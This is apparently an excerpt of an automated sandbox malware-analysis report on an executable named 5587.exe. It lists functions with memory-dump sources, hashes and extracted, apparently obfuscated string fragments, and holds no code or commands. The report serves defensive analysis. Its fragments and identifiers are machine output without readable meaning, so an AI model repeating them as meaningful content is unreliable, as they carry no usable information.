                                                            • String ID: i*vO$i*vO${t$|t$|t$~hP/$~hP/$-~t$-~t$-~t$[K8$[K8
                                                            • API String ID: 0-2157384297
                                                            • Opcode ID: 8e0efb561e1d0784c5c80d78bab557d508b937dcad91054ca421664d78a38de0
                                                            • Instruction ID: e7b32535402da9ea7260c915f4c674442d50cc1c704cce001ee800e2279f532c
                                                            • Opcode Fuzzy Hash: 8e0efb561e1d0784c5c80d78bab557d508b937dcad91054ca421664d78a38de0
                                                            • Instruction Fuzzy Hash: FE139436A1ABC78AEBB49F2988887FD3395EB44754F200537DA0DCBB95CE2CD6408745
                                                            Function 00007FF6A79016F0 Relevance: 16.0, Strings: 12, Instructions: 979COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: *xT9$+xT9$+xT9$,M03$,M03$OQF\$OQF\$WAg$XAg$XAg$nRE$nRE
                                                            • API String ID: 0-2163723366
                                                            • Opcode ID: b894abf3803ad4fa68f2fc648f882be9c8670b5213c5634ef56cc1e20693513a
                                                            • Instruction ID: c335d18618f6e117eda3e396f51a41b055356539787b6f0abebc3c9c7fe942a5
                                                            • Opcode Fuzzy Hash: b894abf3803ad4fa68f2fc648f882be9c8670b5213c5634ef56cc1e20693513a
                                                            • Instruction Fuzzy Hash: BB92EA36B2E78686DE748F19A49027E67A0EB94790F244037EE8DC37A5CF3CD5469B01
                                                            Function 00007FF6A7931900 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 541COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ;D)3$<D)3$<D)3$J]!$$K]!$$K]!$
                                                            • API String ID: 0-1240847699
                                                            • Opcode ID: cb69e4c2936b73608c6b7d5233b11b325f9acd60161b8f4cf863bd87e2ea600b
                                                            • Instruction ID: 272016b986f6341eaf476aafeb4e3d403e95bd6fd2ad6e6ecf59a8e163f5579d
                                                            • Opcode Fuzzy Hash: cb69e4c2936b73608c6b7d5233b11b325f9acd60161b8f4cf863bd87e2ea600b
                                                            • Instruction Fuzzy Hash: A522CC32F49A478AFB248F6594D03BD66A1EB44794F24443BEA1DD77A6CF2CE8808741
                                                            Function 00007FF6A78DEA40 Relevance: 13.5, Strings: 10, Instructions: 989COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: G7 h$H7 h$H7 h$O%`4$O%`4$O%`4$O%`4$t1/a$u1/a$u1/a
                                                            • API String ID: 0-3228459977
                                                            • Opcode ID: 5efc3229cbef3ab89192f4e2d9ca39e0b4b043647e6013f10870c7f7ec6ae40a
                                                            • Instruction ID: 35dfca1486fc1d4f35b8ec3164f07be16fe61606b12eb28929116b742d9758e6
                                                            • Opcode Fuzzy Hash: 5efc3229cbef3ab89192f4e2d9ca39e0b4b043647e6013f10870c7f7ec6ae40a
                                                            • Instruction Fuzzy Hash: 62921A35A0F29386EA748F19A4C067E6FD0FB64350F644973E95EC7796CE2CE8809B05
                                                            Function 00007FF6A79234E0 Relevance: 13.5, Strings: 10, Instructions: 985COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: )4%=$)4%=$;PSl$;PSl$;PSl$J7Cq$K7Cq$K7Cq$\O%$\O%
                                                            • API String ID: 0-3623262031
                                                            • Opcode ID: 8048e73005d1871bf215e4bf7d31f0e3e2911601dea8802e47948e32e90e0ce5
                                                            • Instruction ID: ad7464c219f4f4c72abcffeedfee62e4cdd2fac82219bc5fb184ee0906f4d1c7
                                                            • Opcode Fuzzy Hash: 8048e73005d1871bf215e4bf7d31f0e3e2911601dea8802e47948e32e90e0ce5
                                                            • Instruction Fuzzy Hash: A0A2C732E1EBC686EA649F18D44137E73A8F794754F114226DA9EC3BA6CF3CE4848741
                                                            Function 00007FF6A7934A60 Relevance: 12.0, Strings: 9, Instructions: 737COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: elr$elr$elr$elr$x.0$x.0$x.0$x.0$x.0
                                                            • API String ID: 0-3958519978
                                                            • Opcode ID: d86a36d33b2c3b7dd3412e59502d941fe47a78c83c068f4131f87482df556a8f
                                                            • Instruction ID: 2061499d5dbc8b6e93555add89b40ccfea4cb09acf97f944da319b4e71bf73c2
                                                            • Opcode Fuzzy Hash: d86a36d33b2c3b7dd3412e59502d941fe47a78c83c068f4131f87482df556a8f
                                                            • Instruction Fuzzy Hash: 6962DF3560E68786EA748F19B4C427EA3D0EB88750F20453BE95EC7BB6CE6CE4409B05
                                                            Function 00007FF6A78E57D0 Relevance: 11.9, Strings: 9, Instructions: 654COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: QUe$56~5$Z$Z$]@%f$]@%f$`n?#$an?#$5ts
                                                            • API String ID: 0-1312449679
                                                            • Opcode ID: 45600ddaa5131572220f5a6cc11d1f134978d2b4da326b671a5a94df15453f61
                                                            • Instruction ID: 3231745449d5acc2e81567b71d65af123abe37e875b9f71d2a027176691115f7
                                                            • Opcode Fuzzy Hash: 45600ddaa5131572220f5a6cc11d1f134978d2b4da326b671a5a94df15453f61
                                                            • Instruction Fuzzy Hash: 09421E22F1A15A8EFB688F79489067E2EA2AF56314F604476DD1ED7BD4CF3CE8418701
                                                            Function 00007FF6A792CFE0 Relevance: 10.9, Strings: 8, Instructions: 939COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ;6$;6$46r$46r$46r$gLa$rP|[$rP|[
                                                            • API String ID: 0-3244324794
                                                            • Opcode ID: 6aae0a2fd1c209223029c4b4229db0069cbb66af37f686edea777d3909040e46
                                                            • Instruction ID: 494aea4dd304b63b886187129b63ad8eeb5ce90ec40a8a8dcdb2873a75de77d8
                                                            • Opcode Fuzzy Hash: 6aae0a2fd1c209223029c4b4229db0069cbb66af37f686edea777d3909040e46
                                                            • Instruction Fuzzy Hash: F0924E32A0E7C386EA749F18A49077E67A0FB85750F204477EACED7BA5CE2CD4419781
                                                            Function 00007FF6A78E0470 Relevance: 10.9, Strings: 8, Instructions: 876COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %/9-$%/9-$&t}s$'t}s$'t}s$:^J$;^J$;^J
                                                            • API String ID: 0-542596829
                                                            • Opcode ID: ba2f974e7c33aeedc54bcc6b8ee4476f91951b7ae731b6be3823d16dddf376f4
                                                            • Instruction ID: f33d6ac3cda2a3b495c70fc61117b673d00da140c9f828e075ce401bc206046e
                                                            • Opcode Fuzzy Hash: ba2f974e7c33aeedc54bcc6b8ee4476f91951b7ae731b6be3823d16dddf376f4
                                                            • Instruction Fuzzy Hash: 8E82FA31A0F78A86EA748F58A48037E6BE0EF86750F305976D98DD7795DF2CE8408B41
                                                            Function 00007FF6A7924890 Relevance: 9.6, Strings: 7, Instructions: 820COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: r2e$rX-$rX-$s2e$s2e$s2e$s2e
                                                            • API String ID: 0-2149377876
                                                            • Opcode ID: 763bb99e03227831525fab2bbe3618fe5600c221a30bd64e0f43b8cb8789c431
                                                            • Instruction ID: d20c4b472d9a09ced5b3650a47eed7224cdfb22fa80619dd1827ca2212c161c2
                                                            • Opcode Fuzzy Hash: 763bb99e03227831525fab2bbe3618fe5600c221a30bd64e0f43b8cb8789c431
                                                            • Instruction Fuzzy Hash: E572CB35A0E78786EA749F18A48077E67D0EB85B50F304577D68DC77A6CE2CE9408F81
                                                            Function 00007FF6A78E1520 Relevance: 9.4, Strings: 7, Instructions: 623COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ji|$Ki|$Ki|$V}Ef$V}Ef$r=,*$r=,*
                                                            • API String ID: 0-3340987828
                                                            • Opcode ID: 248cfd362193d2559bafd60c8cd366400c086089d3264eda9b59b70160755353
                                                            • Instruction ID: 4e87a63ca888fde4c08c6267486b697a6723e494c54b59ead8ea0e8a127d5d77
                                                            • Opcode Fuzzy Hash: 248cfd362193d2559bafd60c8cd366400c086089d3264eda9b59b70160755353
                                                            • Instruction Fuzzy Hash: C752FE22E0E78945DE718F25A4802BEB7A0FFD6790F144672EA8DD77A5DF2DE4808701
                                                            Function 00007FF6A78E2110 Relevance: 9.3, Strings: 7, Instructions: 582COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $9kL$%9kL$%9kL$)t_}$)t_}$Mvh=$Mvh=
                                                            • API String ID: 0-968195354
                                                            • Opcode ID: 08359dd5b2b4989ab2c4ee82053d6e51201a0e3c5d49f731e8761b4041d8f09b
                                                            • Instruction ID: 76f461af495cbd3c9befc64758b5331c74a45fec4a252a228a5022a3557fffb0
                                                            • Opcode Fuzzy Hash: 08359dd5b2b4989ab2c4ee82053d6e51201a0e3c5d49f731e8761b4041d8f09b
                                                            • Instruction Fuzzy Hash: F742EE2660EF8A85DE744F19A88037E6B90FB56760F100676EB9EC77E4CF6CE5808705
                                                            Function 00007FF6A78D4850 Relevance: 9.3, Strings: 7, Instructions: 506COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: a 5$b 5$b 5$b 5$\w $\w $\w
                                                            • API String ID: 0-2446191738
                                                            • Opcode ID: 95846db12144fd17fd55d9e4e872651ae35f9f60743868e5ac262e84dbcb942a
                                                            • Instruction ID: fb80b90982317cd34bb45872aa7d7dbd8a8edca203872840a986faba2508d20e
                                                            • Opcode Fuzzy Hash: 95846db12144fd17fd55d9e4e872651ae35f9f60743868e5ac262e84dbcb942a
                                                            • Instruction Fuzzy Hash: 2022847290D28186D7788F15B0A0A7EBAE1FB94744F24417EEA9E53F99CE3CD4408F45
                                                            Function 00007FF6A79594B0 Relevance: 9.1, Strings: 7, Instructions: 352COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: )!1<$*!1<$*!1<$*!1<$*!1<$:c0$:c0
                                                            • API String ID: 0-3215069329
                                                            • Opcode ID: a088cf9bf94b824d90af61f32db411f3838925ce983041ec67074d9aebd8aa9f
                                                            • Instruction ID: b313a6ebe6966bdd3ba3a81c566088d983b6f3edae5c04761b37bb018e558e57
                                                            • Opcode Fuzzy Hash: a088cf9bf94b824d90af61f32db411f3838925ce983041ec67074d9aebd8aa9f
                                                            • Instruction Fuzzy Hash: 91D10B6281D55381FA2E8F25B11013EB6A0BB487A3F005433DE9F86796DF7CDA59CB41
                                                            Function 00007FF6A793D67B Relevance: 8.8, Strings: 6, Instructions: 1306COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: &E5B$&E5B$U"Wi$hS,$s"9$$U{'
                                                            • API String ID: 0-2760824944
                                                            • Opcode ID: db31c015842c2f6ada32f0f101520e524510d79b71ec5577881f397b3c2656f7
                                                            • Instruction ID: cdfe6eb18897d69a4033892e46da581a64ff5e980a2e30dfae65ed49e1127fc7
                                                            • Opcode Fuzzy Hash: db31c015842c2f6ada32f0f101520e524510d79b71ec5577881f397b3c2656f7
                                                            • Instruction Fuzzy Hash: 5DD2C536A0B7C3CAEB748F2C88903BD6294EB44758F14453BD91DCFB9ADE28E5509741
                                                            Function 00007FF6A78D9290 Relevance: 8.2, Strings: 6, Instructions: 740COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 49X$49X$-Y6S$-Y6S$I@n$I@n
                                                            • API String ID: 0-2641073418
                                                            • Opcode ID: 41319e65016db1cfa3ed515ac9ffe5e9877581e79d44a19e868e6218cedcd659
                                                            • Instruction ID: 4555eb1ec18e42a1019b26c957b071afd7a7d88beb86df8b9ec057cc49c8e2e8
                                                            • Opcode Fuzzy Hash: 41319e65016db1cfa3ed515ac9ffe5e9877581e79d44a19e868e6218cedcd659
                                                            • Instruction Fuzzy Hash: 3352E93160E78286DE748F19E48027E6BD0EB88751F245177EA9DC7BDADE3CE4408B05
                                                            Function 00007FF6A794CFE0 Relevance: 7.7, Strings: 5, Instructions: 1452COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: +zKB$+zKB$C:\Users\user\AppData\Local\Temp\5587.exe$^b7$^b7
                                                            • API String ID: 0-4114081984
                                                            • Opcode ID: ec053f7ac21ed8b6f3082fa2ee046dd4a0e0f96e3da8cee7b77e05bf5ffffd99
                                                            • Instruction ID: c7583fdb63721446fc05e96e52d7797ff93f65b87ca7016b2a76338823593a4a
                                                            • Opcode Fuzzy Hash: ec053f7ac21ed8b6f3082fa2ee046dd4a0e0f96e3da8cee7b77e05bf5ffffd99
                                                            • Instruction Fuzzy Hash: DFE2FA39B0F68386EA748F2860943BE63A0AF55310F144533F7ADC7796CE2DE542AB51
                                                            Function 00007FF6A7911680 Relevance: 7.2, Strings: 5, Instructions: 909COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: <[~$<[~$<[~$w4L.$w4L.
                                                            • API String ID: 0-3153527061
                                                            • Opcode ID: 153faf629a56fbed214219d67e40ede2e4e1b139154e6669f235c6eab15a120b
                                                            • Instruction ID: 7f723dda171ea4a80a48c966d3121e0450c51a7eec24084a3e86771225880584
                                                            • Opcode Fuzzy Hash: 153faf629a56fbed214219d67e40ede2e4e1b139154e6669f235c6eab15a120b
                                                            • Instruction Fuzzy Hash: 08922E36B0E78796DEB58F19E4802BE6395EB84790F204137D98DC7B95CF2CE8508B15
                                                            Function 00007FF6A78EC8B0 Relevance: 6.7, Strings: 5, Instructions: 411COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: O(T3$P(T3$P(T3$~3/~$~3/~
                                                            • API String ID: 0-1587709053
                                                            • Opcode ID: 8bc947b53eda18aefdbd190909f3405fd65267b69c52af86f8bbf5d0e53325be
                                                            • Instruction ID: 51dda44840e04884ff6d0e8452f7986b246171b64c7fcb52d082329656ba3a61
                                                            • Opcode Fuzzy Hash: 8bc947b53eda18aefdbd190909f3405fd65267b69c52af86f8bbf5d0e53325be
                                                            • Instruction Fuzzy Hash: C3F16BA3E1E64981EB34CF16E441B3B6A92B786B90F10B531DE6B43B94DF7CD4809B41
                                                            Function 00007FF6A78FD8F0 Relevance: 6.1, Strings: 4, Instructions: 1063COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: b7 P$b7 P$xJPz$xJPz
                                                            • API String ID: 0-366914343
                                                            • Opcode ID: 9270fa86e5e5553154e31e8262a850136301c33e1812d2337e3bec5911a2c976
                                                            • Instruction ID: 10a8bdcf2ad5ccfe5488031e6fbe94ed78d47c0f34646696b7dce845ec729c5a
                                                            • Opcode Fuzzy Hash: 9270fa86e5e5553154e31e8262a850136301c33e1812d2337e3bec5911a2c976
                                                            • Instruction Fuzzy Hash: 3EB2C631B0E68685EB748F58A4903BE6BD0EF85750F204576DB8DC7798CE2CE980DB52
                                                            Function 00007FF6A7912870 Relevance: 6.0, Strings: 4, Instructions: 1010COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: dD($dD($Bq`$Bq`
                                                            • API String ID: 0-1154677644
                                                            • Opcode ID: 1bd8833c2873f974514a1164ca2fd178c257b968a557c03ec9d23a0fa9dcba9b
                                                            • Instruction ID: 1318bf277dfa87b8ff98bb24d867b54abcd9eb0f6353fc827071a1a2e27d046c
                                                            • Opcode Fuzzy Hash: 1bd8833c2873f974514a1164ca2fd178c257b968a557c03ec9d23a0fa9dcba9b
                                                            • Instruction Fuzzy Hash: AAA29736B0DBC682DA758F19E18026EA7A8F799794F104123EECDC7B69CF2CD5508B11
                                                            Function 00007FF6A78F68EB Relevance: 5.5, Strings: 4, Instructions: 496COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
